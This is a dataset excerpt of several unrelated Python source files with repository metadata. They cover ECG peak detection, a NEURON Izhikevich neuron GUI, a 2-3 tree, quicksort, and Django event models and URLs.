f.write(str(e) + "\n")
f.close()
'''
#ecg = map(lambda x: x * 255, ecg)
#for testing
return ecg[0:n]
def filterBandPassFIR(ecg):
ker = open(FILTER_PATH,'r').readlines()
ker = map(str.strip, ker)
ker = map(float, ker)
global filterN
filterN = len(ker)
global filterDelay
filterDelay = filterN / 2
newEcg = []
for i in range(len(ker), len(ecg)):
v = 0.0
for j in range(0,len(ker)):
v += ker[j] * ecg[i - j]
newEcg.append(v)
return newEcg
def nonLinearFilter(ecg):
return map(lambda x: sign(x) * x * x, ecg)
def addHFS(input):
z = []
k_prev = 0.0
for i in range(len(input)):
k = lambda_k * k_prev + (1 - lambda_k) * abs(input[i]) * c_k
z.append(input[i] + pow(-1, i) * k)
k_prev = k
return z
def computeFeature(z):
d = []
d_prev = 0
for i in range(1,len(z)):
dd = abs(sign(z[i]) - sign(z[i - 1])) / 2
new_d = lambda_D * d_prev + (1 - lambda_D) * dd
d.append(new_d)
d_prev = new_d
return d
def computeTheta(d):
Th = []
th_prev = 0.0
for i in range(len(d)):
new_Th = lambda_Th * th_prev + (1 - lambda_Th) * d[i]
Th.append(new_Th)
th_prev = new_Th
return Th
def getEvents(D, Th):
events = [] #each event is a tuple: (start, end)
start = 0
inEvent = False
needToCombine = False
lastEvent = (-10000, -1000)
for i in range(len(D)):
if D[i] < Th[i] and not inEvent :
#new event detected
start = i
inEvent = True
if (i - lastEvent[1]) < 42 :
start = events[-1][0]
needToCombine = True
else :
needToCombine = False
continue
#need to check distance from last event
if D[i] > Th[i] and inEvent :
#event ended
lastEvent = (start, i)
if needToCombine :
events[-1] = lastEvent
else :
events.append(lastEvent)
needToCombine = False
inEvent = False
start = 0
if inEvent :
events.append((start, len(D)))
return events
def getRpeaks(events, y):
rPeaks = []
for event in events:
start = event[0]
end = event[1]
y_max = -10000000000
y_max_ind = 0
for i in range(start, end) :
if y[i] > y_max :
y_max = y[i]
y_max_ind = i
if y_max_ind > 0 :
rPeaks.append(y_max_ind)
return rPeaks
def main():
plotFlag = True
tm = time.time()
ecg = readECG()
t = [0.002 * x for x in range(len(ecg))]
# print "read data in ", time.time() - tm
#need to filter signal
ecgFIR = filterBandPassFIR(ecg)
y = nonLinearFilter(ecgFIR)
# print "data filtered in ", time.time() - tm
n = len(ecg)
m = len(ecgFIR)
# print 'n = ', n
# print 'm = ', m
# print 'filter N = ', filterN
# print 'filterDelay = ', filterDelay
if plotFlag :
plt.figure(1)
plt.plot(t[0:n], ecg[0:n], t[filterDelay:n - (filterN - filterDelay)], ecgFIR[0:m], 'r-')
#adding high-frequency seq
z = addHFS(y)
# print "high-frequency seq added in ", time.time() - tm
D = computeFeature(z)
# print "d computed in ", time.time() - tm
Th = computeTheta(D)
events = getEvents(D, Th)
# print "events = ", events
rPeaks = getRpeaks(events, y)
print "R peaks = ", rPeaks
d = (n - m) / 2
# print d
if plotFlag :
#plt.figure(2)
#plt.plot(t[0:n], ecg[0:n],t[d : n - d - 1], z[0:m], 'r-')
#plt.plot(t[0:m], y[0:m],t[0 : m - 1], D[0:m - 1], 'r-')
#plt.plot(t[0:len(D)],Th[0:len(D)], t[0 : len(D)], D, 'r-')
#plt.plot(t[0:len(D)],events,'r-')
plt.figure(3)
#plt.plot(t[:1000], ecg[:1000])
tt = map(lambda x: (x + filterDelay) * 0.002, rPeaks);
d = []
for item in rPeaks :
d.append(ecg[item + filterDelay])
plt.plot(t[:m], ecg[:m],'b-', tt, d, 'ro')
plt.show()
quit()
return
main() | [
"maxpilgrim94@gmail.com"
] | maxpilgrim94@gmail.com |
a06f4cacd3ceb7788c1165cbd743fe875f3f06ec | 3387493ac3c18d8d7a1e36f9f268bbaf9a494cf1 | /Find longest subset with sum 0.py | 9b13825c75110628a0dbb3f41f2d580575e44a38 | [] | no_license | Shaurya-L/Data-Structures-and-Algorithms-in-Python | 8b4ca1c23f84c02b1bab4469180c199154bade02 | 1da445905663dcd7035dcd78cc4d56695a32d6fa | refs/heads/master | 2020-09-26T12:22:08.854564 | 2020-01-27T16:27:16 | 2020-01-27T16:27:16 | 226,254,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | def subsetSum(l):
#Implement Your Code Here
d = {}
max_len = 0
curr_sum = 0
for i in range(n):
curr_sum += l[i]
if l[i]==0 and max_len == 0:
max_len = 1
if curr_sum is 0:
max_len = i + 1
if curr_sum in d:
max_len = max(max_len, i - d[curr_sum] )
else:
d[curr_sum] = i
return max_len
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
finalLen= subsetSum(l)
print(finalLen)
| [
"noreply@github.com"
] | noreply@github.com |
50972c24f80116bd960f7350abeb6b01cde72fdf | 4b7806dd0ea8f7eb54bec25eb5afcdfdc02d91cf | /NEURON/izhiGUI.py | 7b966f77d36f4b185374e9a3d30eb777ae9d16a8 | [] | permissive | OpenSourceBrain/IzhikevichModel | ab6018e8392b073d17cb4e29c68108a4397f098a | 83fe93ea390bb240f31e7352f6a4ad744dec43ca | refs/heads/master | 2023-08-31T00:01:19.985460 | 2023-08-18T15:13:31 | 2023-08-18T15:13:31 | 4,956,319 | 23 | 10 | BSD-3-Clause | 2023-09-04T11:06:46 | 2012-07-09T10:41:31 | Jupyter Notebook | UTF-8 | Python | false | false | 15,133 | py | """
izh.py
Python/NEURON GUI for the different celltypes of Izhikevich neuron (versions from 2 publications).
* 2003 Izhikevich artificial neuron model from
EM Izhikevich "Simple Model of Spiking Neurons"
IEEE Transactions On Neural Networks, Vol. 14, No. 6, November 2003 pp 1569-1572
* 2007 Izhikevich artificial neuron model from
EM Izhikevich (2007) "Dynamical systems in neuroscience" MIT Press
Cell types available from Izhikevich, 2007 book:
1. RS - Layer 5 regular spiking pyramidal cell (fig 8.12 from 2007 book)
2. IB - Layer 5 intrinsically bursting cell (fig 8.19 from 2007 book)
3. CH - Cat primary visual cortex chattering cell (fig8.23 from 2007 book)
4. LTS - Rat barrel cortex Low-threshold spiking interneuron (fig8.25 from 2007 book)
5. FS - Rat visual cortex layer 5 fast-spiking interneuron (fig8.27 from 2007 book)
6. TC - Cat dorsal LGN thalamocortical (TC) cell (fig8.31 from 2007 book)
7. RTN - Rat reticular thalamic nucleus (RTN) cell (fig8.32 from 2007 book)
Implementation by: Salvador Dura-Bernal, Cliff Kerr, Bill Lytton
(salvadordura@gmail.com; cliffk@neurosim.downstate.edu; billl@neurosim.downstate.edu)
"""
# adapted from /u/billl/nrniv/sync/izh.hoc
import os, sys, collections
import numpy as np
from neuron import h, gui
h.load_file('stdrun.hoc')
import izhi2007Figs as iz07fig
import izhi2007Wrapper as izh07
import __main__
py = __main__
h.tstop=500
h.cvode_active(0)
h.dt=0.1
izh, cell07 = None, None # must be declared here since needs to be imported elsewhere
type2003 = collections.OrderedDict([
# a b c d vviv tstop
('regular spiking (RS)' , (0.02 , 0.2 , -65.0 , 8.0 , -63.0 , 150.0)) ,
('intrinsically bursting (IB)' , (0.02 , 0.2 , -55.0 , 4.0 , -70.0 , 150.0)) ,
('chattering (CH)' , (0.02 , 0.2 , -50.0 , 2.0 , -70.0 , 150.0)) ,
('fast spiking (FS)' , (0.1 , 0.2 , -65.0 , 2.0 , -70.0 , 150.0)) ,
('thalamo-cortical (TC)' , (0.02 , 0.25, -65.0 , 0.05 , -63.0 , 150.0)) ,
('thalamo-cortical burst (TC)' , (0.02 , 0.25, -65.0 , 0.05 , -87.0 , 150.0)) ,
('resonator (RZ)' , (0.1 , 0.26 , -65.0 , 2.0 , -70.0 , 100.0)) ,
('low-threshold spiking (LTS)' , (0.02 , 0.25 , -65.0 , 2.0 , -63.0 , 250.0))])
type2004 = collections.OrderedDict([
# a b c d vviv tstop
('tonic spiking' , (0.02 , 0.2 , -65.0 , 6.0 , -70.0 , 100.0)) ,
('mixed mode' , (0.02 , 0.2 , -55.0 , 4.0 , -70.0 , 160.0)) ,
('spike latency' , (0.02 , 0.2 , -65.0 , 6.0 , -70.0 , 100.0)) ,
('rebound spike' , (0.03 , 0.25 , -60.0 , 4.0 , -64.0 , 200.0)) ,
('Depolarizing afterpotential' , (1.0 , 0.2 , -60.0 , -21.0 , -70.0 , 50.0)) ,
('phasic spiking' , (0.02 , 0.25 , -65.0 , 6.0 , -64.0 , 200.0)) ,
('spike frequency adaptation' , (0.01 , 0.2 , -65.0 , 8.0 , -70.0 , 85.0)) ,
('subthreshold oscillations' , (0.05 , 0.26 , -60.0 , 0.0 , -62.0 , 200.0)) ,
('rebound burst' , (0.03 , 0.25 , -52.0 , 0.0 , -64.0 , 200.0)) ,
('accomodation' , (0.02 , 1.0 , -55.0 , 4.0 , -65.0 , 400.0)) ,
('tonic bursting' , (0.02 , 0.2 , -50.0 , 2.0 , -70.0 , 220.0)) ,
('Class 1' , (0.02 , -0.1 , -55.0 , 6.0 , -60.0 , 300.0)) ,
('resonator' , (0.1 , 0.26 , -60.0 , -1.0 , -62.0 , 400.0)) ,
('threshold variability' , (0.03 , 0.25 , -60.0 , 4.0 , -64.0 , 100.0)) ,
('inhibition-induced spiking' , (-0.02 , -1.0 , -60.0 , 8.0 , -63.8 , 350.0)) ,
('phasic bursting' , (0.02 , 0.25 , -55.0 , 0.05 , -64.0 , 200.0)) ,
('Class 2' , (0.2 , 0.26 , -65.0 , 0.0 , -64.0 , 300.0)) ,
('integrator' , (0.02 , -0.1 , -55.0 , 6.0 , -60.0 , 100.0)) ,
('bistability' , (0.1 , 0.26 , -60.0 , 0.0 , -61.0 , 300.0)) ,
('inhibition-induced bursting' , (-0.026 , -1.0 , -45.0 , -2.0 , -63.8 , 350.0))])
choices = collections.OrderedDict([
('2003 PP model' , (lambda: h.Izhi2003a(0.5,sec=cell03), lambda: izh._ref_V, type2003)),
('2003 Sec model', (lambda: h.Izhi2003b(0.5,sec=cell03), lambda: cell03(0.5)._ref_v, type2003)),
('2004 PP model' , (lambda: h.Izhi2003a(0.5,sec=cell03), lambda: izh._ref_V, type2004)),
('2004 Sec model', (lambda: h.Izhi2003b(0.5,sec=cell03), lambda: cell03(0.5)._ref_v, type2004)),
('2007 PP model' , (lambda: izh07.IzhiCell(host=izh07.dummy), lambda: izh._ref_V, izh07.type2007)),
('2007 Sec model' , (lambda: izh07.IzhiCell(), lambda: cell07.sec(0.5)._ref_v, izh07.type2007))])
ch=choices.keys()
def newmodel (ty=None) :
"2003,2004 was the orig model; 2007 is the redesign; look at global izhtype if no "
return izhtype.find('2007') > -1 if ty is None else ty.find('2007') > -1
#* setup the cell
izhtype='2004 PP model'
def cellset ():
global cell07, cell03, izh, vref, uvvset, fih, izhtype
if newmodel():
cell07 = choices[izhtype][0]()
izh = cell07.izh
def uvvset () : pass
else:
cell03 = h.Section(name="cell2003") # this cell will be used for 2003/4; different cell created in izhi2007Wrapper for those
izh = choices[izhtype][0]()
def uvvset () : vref[0], izh.u = vviv, vviv*izh.b
cell03.L, cell03.diam = 6.37, 5 # empirically tuned -- cell size only used for Izh1
fih = [h.FInitializeHandler(uvvset), h.FInitializeHandler(0,Isend)]
vref = choices[izhtype][1]() # can define this afterwards even though used in uvvset above
# h('objref izh'); h.izh = izh # if need to access from hoc
#* parameters for different cell types
playvec, playtvec = [h.Vector() for x in range(2)]
# initialization routines
name, params = None, None
def p (nm, pm=None) :
global name, vviv, params, vvset
if pm is None : pm = choices[izhtype][2][nm]
name, params = nm, pm
if newmodel():
izh.C, izh.k, izh.vr, izh.vt, izh.vpeak, izh.a, izh.b, izh.c, izh.d, izh.celltype = params
h.tstop=1000
else:
izh.a, izh.b, izh.c, izh.d, vviv, h.tstop = params
g.size(0,h.tstop,-100,50)
try:
if newmodel():
graphx() # interviews graphics
iz07fig.recorder(cell07, choices[izhtype][1]()) # vectors to draw under matplotlib
iz07fig.test1(cell07, nm, izhtype)
else:
iz07fig.closeFig()
graphx()
playinit()
h.run()
except: print sys.exc_info()[0],' :',sys.exc_info()[1]
def ivwrap (func, label=''):
wrapper = h.VBox()
wrapper.intercept(1)
func()
wrapper.intercept(0)
wrapper.map(label)
return wrapper
def graphx ():
g.erase_all()
g.addvar("v", choices[izhtype][1](), 2,2)
g.addvar("u", izh._ref_u, 3,1)
g.addvar("Iin", izh._ref_Iin if newmodel() else izh._ref_Iin, 4,2)
try: g.addvar("gsyn", izh._ref_gsyn, 1, 1)
except: pass
I0=I1=T1=0
def playinit () :
global I0,I1,T1
try: izh.f, izh.g= 5, 140 # standard params: V'=0.04*V^2 + 5*V + 140 - u + Iin
except: pass
bub.label[0] = '%s'%(name)
if name=='Depolarizing afterpotential': bub.label[0] = "%s -- REPEATED SPIKING"%(bub.label[0])
if name=='accomodation': bub.label[0] = "%s -- NOT IMPLEMENTED (different functional form;see izh.mod)"%(bub.label[0])
if name=='inhibition-induced bursting': bub.label[0] = "%s -- NOT IMPLEMENTED (convergence problems)"%(bub.label[0])
g.label(0.1,0.9,bub.label[0])
print bub.label[0]
playvec.play_remove()
playtvec.resize(0); playvec.resize(0)
if name=='Class 1' :
T1=30
playtvec.append(0,T1,h.tstop)
playvec.append(0,0,0.075*(h.tstop-T1))
elif name=='Class 2' : # (H) Class 2 exc.
T1=30
playtvec.append(0,T1,h.tstop)
playvec.append(-0.5, -0.5,-0.05+0.015*(h.tstop-T1))
elif name=='accomodation' : # (R) accomodation
playtvec.append(0, 200, 200.001, 300, 312.5, 312.501, h.tstop)
playvec.append( 0, 200/25, 0 , 0 , 4 , 0 , 0)
if name in ['Class 1', 'Class 2', 'accomodation'] : playvec.play(izh._ref_Iin, playtvec, 1)
if name in ['Class 1', 'integrator'] :
try: izh.f, izh.g = 4.1, 108 # don't exist in all the models
except: pass
def synon () :
"Turn on a synapse"
global ns, nc
ns = h.NetStim()
nc = h.NetCon(ns,izh,0,1,10)
ns.start, ns.interval, ns.number = 10, 10, 10
nc.weight[0] = 2
izh.taug = 3
#* box of buttons
class Bubox :
def __init__ (self, type, li) :
self.izhtype = type
vbox, hbox, hbox1 = h.VBox(), h.HBox(), h.HBox()
self.vbox = vbox
lil = len(li)
self.cols, self.rows = {20:(4,5), 8:(4,2), 9:(3,3)}[lil]
self.label=h.ref('================================================================================')
vbox.intercept(1)
h.xpanel("")
h.xvarlabel(self.label)
if newmodel(self.izhtype):
h.xlabel("V' = (k*(V-vr)*(V-vt) - u + Iin)/C if (V>vpeak) V=c [reset]")
h.xlabel("u' = a*(b*(V-vr) - u) if (V>vpeak) u=u+d")
else:
h.xlabel("v' = 0.04*v*v + f*v + g - u + Iin; if (v>thresh) v=c [reset]")
h.xlabel("u' = a*(b*v - u); if (v>thresh) u=u+d")
h.xpanel()
hbox1.intercept(1)
h.xpanel(""); h.xbutton("RUN",h.run); h.xpanel()
self.xvalue('I0','I0')
self.xvalue('I1','I1')
self.xvalue('T1','T1')
hbox1.intercept(0); hbox1.map("")
hbox.intercept(1)
for ii,(k,v) in enumerate(li.iteritems()):
if ii%self.rows==0: h.xpanel("")
h.xbutton(k, (lambda f, arg1, arg2: lambda: f(arg1,arg2))(p, k, v)) # alternative is to use functools.partial
if ii%self.rows==self.rows-1: h.xpanel()
hbox.intercept(0); hbox.map("")
vbox.intercept(0); vbox.map("Spike patterns")
self.label[0]=""
def pr (): pass
def xvalue (self,name,var,obj=py,runner=pr):
h.xpanel("")
h.xvalue(name,(obj, var),0,runner)
h.xpanel()
def xpvalue (self,name,ptr,runner=pr):
"Doesn't work currently"
h.xpanel("")
h.xpvalue(name,ptr,1,runner)
h.xpanel()
def transpose (self,x) : return int(x/self.rows) + x%self.rows*self.cols
# end class Bubox
# current injections for specific models
def Isend () :
global T1,I0,I1
if I0!=0 or I1!=0:
Iin = I0
Isend1(T1,I1)
return
T1=h.tstop/10
if not newmodel(): izh.Iin=0
if name=='tonic spiking': # (A) tonic spiking
Isend1(T1,14)
elif name=='phasic spiking': # (B) phasic spiking
T1=20
Isend1(T1,0.5)
elif name=='tonic bursting': # (C) tonic bursting
T1=22
Isend1(T1,15)
elif name=='phasic bursting': # (D) phasic bursting
T1=20
Isend1(T1,0.6)
elif name=='mixed mode': # (E) mixed mode
Isend1(T1,10)
elif name=='spike frequency adaptation': # (F) spike freq. adapt
Isend1(T1,30)
elif name=='Class 1': # (G) Class 1 exc. -- playvec
pass
elif name=='Class 2': # (H) Class 2 exc. -- playvec
pass
elif name=='spike latency': # (izh.Iin) spike latency
Isend1(T1,7.04)
Isend1(T1+3,0.0)
elif name=='subthreshold oscillations': # (J) subthresh. osc.
Isend1(T1,2)
Isend1(T1+5,0)
elif name=='resonator': # (K) resonator
T2, T3 = T1+20, 0.7*h.tstop
T4 = T3+40
Isend1(T1,0.65) ; Isend1(T2,0.65) ; Isend1(T3,0.65) ; Isend1(T4,0.65)
Isend1(T1+4,0.) ; Isend1(T2+4,0.) ; Isend1(T3+4,0.) ; Isend1(T4+4,0.)
elif name=='integrator': # (L) integrator
T1, T3 = h.tstop/11, 0.7*h.tstop
T2, T4 = T1+5, T3+10
Isend1(T1,9) ; Isend1(T2,9) ; Isend1(T3,9) ; Isend1(T4,9)
Isend1(T1+2,0.) ; Isend1(T2+2,0.) ; Isend1(T3+2,0.) ; Isend1(T4+4,0.)
elif name=='rebound spike': # (M) rebound spike
T1=20
Isend1(T1,-15)
Isend1(T1+5,0)
elif name=='rebound burst': # (N) rebound burst
T1=20
Isend1(T1,-15)
Isend1(T1+5,0)
elif name=='threshold variability': # (O) thresh. variability
T1, T2, T3 =10, 70, 80
Isend1(T1,1) ; Isend1(T2,-6) ; Isend1(T3,1)
Isend1(T1+5,0.) ; Isend1(T2+5,0.) ; Isend1(T3+5,0.)
elif name=='bistability': # (P) bistability
T1, T2, izh.Iin = h.tstop/8, 216, 0.24
Isend1(T1,1.24) ; Isend1(T2,1.24)
Isend1(T1+5,0.24); Isend1(T2+5,0.24)
elif name=='Depolarizing afterpotential': # (Q) DAP depolarizing afterpotential
T1 = 10
Isend1(T1-1,20)
Isend1(T1+1,0)
elif name=='accomodation': # (R) accomodation -- playvec
pass
elif name=='inhibition-induced spiking': # (S) inhibition induced spiking
izh.Iin=80
Isend1(50,75)
Isend1(250,80)
elif name=='inhibition-induced bursting': # (T) inhibition induced bursting
izh.Iin=80
Isend1(50,80) # Isend1(50,75) -- will crash simulator
Isend1(250,80)
elif name=='regular spiking (RS)': # regular spiking (RS)
Isend1(T1,14)
elif name=='intrinsically bursting (IB)': # intrinsically bursting (IB)
Isend1(T1,11)
elif name=='chattering (CH)': # chattering (CH)
Isend1(T1,10)
elif name=='fast spiking (FS)': # fast spiking (FS)
Isend1(T1,10)
elif name=='thalamo-cortical (TC)': # thalamo-cortical (TC)
Isend1(2*T1,1.5)
elif name=='thalamo-cortical burst (TC)': # thalamo-cortical burst (TC)
Isend1(0,-25)
Isend1(3*T1,0)
elif name=='resonator (RZ)': # resonator (RZ)
Isend1(0,-2)
Isend1(T1,-0.5)
Isend1(T1+50,10)
Isend1(T1+55,-0.5)
elif name=='low-threshold spiking (LTS)': # low-threshold spiking (LTS)
Isend1(T1,10)
elif name == 'TC_burst': # thalamo-cortical burst (TC) (2007)
Isend1(0,-1200)
Isend1(120,110)
elif name == 'RTN_burst': # reticular thalamic nucleus burst (TC) (2007)
Isend1(0,-350)
Isend1(120,90)
def Isend1 (tm, Iin) :
def my_event():
izh.Iin = Iin
h.CVode().re_init()
h.cvode.event(tm, my_event)
# izhstim() sets up a single stim into izh cell
# effect easily seen by running "Class 1"
def izhstim () :
stim=h.NetStim(0.5)
stim.number = stim.start = 1
nc = h.NetCon(stim,izh)
nc.delay = 2
nc.weight = 0.1
izh.erev = -5
#* plotting & printing
g, nmenu, bub = None, None, None
def isinstanceh (objref,objtype) : return objref.hname().startswith(objtype.hname()[:-2])
def winup (izht=izhtype):
global bub, g, nmenu, izhtype
izhtype = izht # swap in the new one
cellset()
if g is None:
g=h.Graph(0)
h.graphList[0].append(g)
if g.view_count()<1:
g.view(-0.1*h.tstop,-90,1.2*h.tstop,150,300,200,400,200)
g.size(0,h.tstop,-80,40)
if not bub is None: bub.vbox.unmap()
bub = Bubox(izhtype,choices[izhtype][2])
bub.label[0] = izhtype
if not nmenu is None: nmenu.unmap()
nmenu = ivwrap(lambda: h.nrnpointmenu(izh), izh.hname())
def chwin ():
"Launch windows from model list"
h.xpanel("Izhikevich models")
# outer lambda returns inner lambda so as to pass arg to winup() -- the innermost routine
for c in ch:
h.xbutton(c, (lambda f, arg1: lambda: f(arg1))(winup,c))
h.xpanel()
def vtvec(vv): return np.linspace(0, len(vv)*h.dt, len(vv), endpoint=True)
if __name__ == '__main__': chwin()
| [
"p.gleeson@gmail.com"
] | p.gleeson@gmail.com |
21a493288805c9f4249815db526a22a557cd0946 | 45e7ede656fa223ea3b5c359ccd8f9bdcdb0e357 | /Ayudantía 8/23tree.py | d65fb9dbc95ab7b6a051355afd254d142f27e34c | [
"MIT"
] | permissive | JohnBidwellB/EDD-2018-1 | a4d6b4ecb36e9dc716c398e2efd24cd7bf809470 | 2f50c75aa55e643d33db43cd10e33421b69aaca2 | refs/heads/master | 2021-09-16T09:49:14.587741 | 2018-06-19T04:16:25 | 2018-06-19T04:16:25 | 125,936,571 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,434 | py | class Node:
def __init__(self, value):
self.data = [value]
self.parent = None
self.child = []
def __str__(self):
if self.parent:
return str(self.parent.data) + " : " + str(self.data)
return "Root: " + str(self.data)
def _is_leaf(self):
return len(self.child) == 0
def _add(self, new_node):
for child in new_node.child:
child.parent = self
self.data.extend(new_node.data)
self.data.sort()
self.child.extend(new_node.child)
if len(self.child) > 1:
self.child.sort()
if len(self.data) > 2:
self._split()
# Encuentra el nodo correcto donde insertar el nuevo nodo
def _insert(self, new_node):
# Si es hoja, añade el dato a la hoja y hace un balanceo
if self._is_leaf():
self._add(new_node)
# Si no es hoja, debe encontrar el hijo correcto para descender y hace una inserción recursiva
elif new_node.data[0] > self.data[-1]:
self.child[-1]._insert(new_node)
else:
for i in range(0, len(self.data)):
if new_node.data[0] < self.data[i]:
self.child[i]._insert(new_node)
break
# Cuando hay 3 items en el nodo, se divide en un nuevo sub-arbol y se añade al padre
def _split(self):
left_child = Node(self.data[0], self)
right_child = Node(self.data[2], self)
if self.child:
self.child[0].parent = left_child
self.child[1].parent = left_child
self.child[2].parent = right_child
self.child[3].parent = right_child
left_child.child = [self.child[0], self.child[1]]
right_child.child = [self.child[2], self.child[3]]
self.child = [left_child]
self.child.append(right_child)
self.data = [self.data[1]]
# Ahora tenemos un nuevo sub-arbol, y necesitamos añadirlo a su nodo padre
if self.parent:
if self in self.parent.child:
self.parent.child.remove(self)
self.parent._add(self)
else:
left_child.parent = self
right_child.parent = self
# Busca un item en el arbol y lo retorna siesque lo encuentra, en caso contrario retorna False
def _find(self, item):
if item in self.data:
return item
elif self._is_leaf():
return False
elif item > self.data[-1]:
return self.child[-1]._find(item)
else:
for i in range(len(self.data)):
if item < self.data[i]:
return self.child[i]._find(item)
def _remove(self, item):
pass
# Imprime en pre-order
def _preorder(self):
print(self)
for child in self.child:
child._preorder()
class Tree:
def __init__(self):
self.root = None
def empty(self):
return self.root == None
def insert(self, value):
# Cuando se inserta un valor, siempre se crea un nuevo nodo
if self.empty():
self.root = Node(value)
else:
self.root._insert(Node(value))
while self.root.parent:
self.root = self.root.parent
return True
def remove(self, item):
pass
def find(self, item):
return self.root._find(item)
def pre_order(self):
self.root._preorder()
if __name__=="__main__":
pass
| [
"johnbidwellb@gmail.com"
] | johnbidwellb@gmail.com |
d704be6d1bfc2c06b2ff9f30222c54c1b0b1c0fe | 555fc06192df6d4375dbbc2d17f38c5783c6ef05 | /Lesson03/case05.py | 976c24b2285a32c23c7849f85ef260aeec546145 | [] | no_license | tina8860035/yzu_python | d658e3c6da8f132f054adbeb155c4794c606fc1e | f069efd191dfdb1802068cab1f976ef8a15c3a37 | refs/heads/master | 2021-05-26T10:14:04.770271 | 2020-06-10T13:34:21 | 2020-06-10T13:34:21 | 254,091,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | def mask(money):
x = money // 5
size = "成人"
return x, size
my_x, my_size = mask(120)
print(my_x, my_size)
| [
"52558635+tina8860035@users.noreply.github.com"
] | 52558635+tina8860035@users.noreply.github.com |
bdde1733e3aad7d31e2d6f9dcb889e9c085df1f7 | f1117bf18739dba62a5a50bd86f0fdbf9827434f | /MyQuickSort.py | d5de0db1f857977075bcdcfcc09925b15caf1c25 | [] | no_license | Sohaib-50/MyQuickSort | 9fe8c6b22fa66d8db400fff9d519316893bcc8ef | 7affb3b1346e4266ab392aa1d4172cafabdc90e1 | refs/heads/main | 2023-01-23T22:38:10.330858 | 2020-12-04T15:42:12 | 2020-12-04T15:42:12 | 318,557,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | from stackwithlist import mystack
def QuickSort(lst):
if len(lst) == 1:
return
stack = mystack()
stack.push( (0, len(lst) - 1) )
while not stack.isEmpty():
current_range = stack.pop()
left, right = current_range # tuple unpack
loc = left # selecting first element of current list to be pivot everytime
pivot_element = lst[loc]
# move pivot element to its correct position
while left < right:
if loc == left: # need to search from right to loc
while right != loc:
if lst[right] < pivot_element:
lst[right], lst[loc] = lst[loc], lst[right]
loc = right
break
right -= 1
else: # need to search from left to loc
while left != loc:
if lst[left] > pivot_element:
lst[left], lst[loc] = lst[loc], lst[left]
loc = left
break
left += 1
if (loc - current_range[0]) > 1: # if left subsequence has more than 1 element
stack.push( (current_range[0], loc - 1) )
if (current_range[1] - loc) > 1: # if right subsequence has more than 1 element
stack.push( (loc + 1, current_range[1]) )
# Test code
# lst = "11 55 77 90 40 60 99 22 88 66".split()
# print("List before sorting:", lst)
# QuickSort(lst)
# print("List after sorting:", lst)
| [
"i.am_sa@Yahoo.com"
] | i.am_sa@Yahoo.com |
8603f1ec9bc1cebdababdfa6e7596867c7eec586 | bad4fb6e47603f356d14ea7c4228ffbd20427e6c | /local/lpcevento/evento/models.py | 83ec691569bf2637c7351ac8c762d8494b5f7b74 | [] | no_license | lucas62/trabalhoG1 | 1bc106f100d765b39664b6b701febe3d2f0abc25 | 4591e827875a65fb9ddf86930ee93807825be189 | refs/heads/master | 2021-06-25T15:13:14.592680 | 2017-09-11T20:34:41 | 2017-09-11T20:34:41 | 103,184,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,951 | py | from django.db import models
# Create your models here.
class Pessoa(models.Model):
nome = models.CharField(max_length=150)
email = models.CharField(max_length=150)
def __str__(self):
return self.nome
class PessoaFisica(Pessoa):
cpf = models.CharField(max_length=11)
def __str__(self):
return '{}'.format(self.nome)
class PessoaJuridica(Pessoa):
cnpj = models.CharField(max_length=15)
razaoSocial = models.CharField(max_length=128)
def __str__(self):
return '{}'.format(self.nome)
class Autor(Pessoa):
curriculo = models.CharField(max_length=128)
artigos = models.ManyToManyField('ArtigoCientifico')
def __str__(self):
return '{}'.format(self.nome)
class Evento(models.Model):
nome = models.CharField(max_length=150)
eventoPrincipal = models.CharField(max_length=128, null=True, blank=False)
sigla = models.CharField(max_length=128, null=True, blank=False)
dataEHoraDeInicio = models.DateTimeField(blank=True, null=True)
palavrasChave = models.CharField(max_length=128, null=True, blank=False)
logoTipo = models.CharField(max_length=128, null=True, blank=False)
realizador = models.ForeignKey(Pessoa, null=True, blank=False)
cidade = models.CharField(max_length=128)
uf = models.CharField(max_length=128)
endereco = models.CharField(max_length=128, null=True, blank=False)
cep = models.CharField(max_length=128, null=True, blank=False)
def __str__(self):
return '{}'.format(self.nome)
class EventoCientifico(Evento):
issn = models.CharField(max_length=128)
def __str__(self):
return '{}'.format(self.nome)
class ArtigoCientifico(models.Model):
titulo = models.CharField(max_length=128)
autores = models.ManyToManyField('Autor')
evento = models.ForeignKey(EventoCientifico, null=True, blank=False)
def __str__(self):
return '{}'.format(self.titulo) | [
"lucas.pires100.la@gmail.com"
] | lucas.pires100.la@gmail.com |
dce98cca1fcd4e0ddd6d4fa4399422fe437fba37 | 9da37920bec0710a594bf0c426216894cabfc8d7 | /log_handler.py | f8fdbc7b9ff19fdc4222eea64a4c8aa3a817c87e | [] | no_license | nathansikora/CamDuino | 54875870073b22a6a5fbc566b4914c1bbfbbde7f | 9b9f62cea4714f34e1c1f406dec5314bc22f2651 | refs/heads/main | 2023-06-05T03:17:52.207525 | 2021-06-30T18:17:06 | 2021-06-30T18:17:06 | 320,819,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from time import asctime
LOG_FILE = 'log.txt'
IS_LOG_TO_FILE = True
LOG_STR = '{0} : {1}\n'
class Logger:
@staticmethod
def log(msg, path=LOG_FILE, is_log_to_file=IS_LOG_TO_FILE):
msg = LOG_STR.format(asctime(), msg)
print(msg)
if is_log_to_file:
with open(path, 'a') as ff:
ff.write(msg)
| [
"nathanikora@gmail.com"
] | nathanikora@gmail.com |
b78332e426db0c012566299a4099427eb04b134f | 9b87f57ca5934a3aaaaf40fb467a279c88c83da4 | /account/urls.py | ee4c841ef120ec4414ac1c0f027f53662358b558 | [] | no_license | TechlopersWork/techDjango | b3e1edb8a80239d0da0679728a075879e1349506 | b3dc2e11f25ab8983b35aa64a9ba76b0b7c1f09a | refs/heads/master | 2023-08-13T18:21:16.335711 | 2020-05-14T02:15:42 | 2020-05-14T02:15:42 | 263,793,558 | 0 | 0 | null | 2021-09-22T19:01:15 | 2020-05-14T02:20:13 | Python | UTF-8 | Python | false | false | 147 | py | from django.urls import path
from . import views
urlpatterns = [
path('techlopian/', views.techlopian),
path('clients/', views.client),
]
| [
"techloperswork@gmail.com"
] | techloperswork@gmail.com |
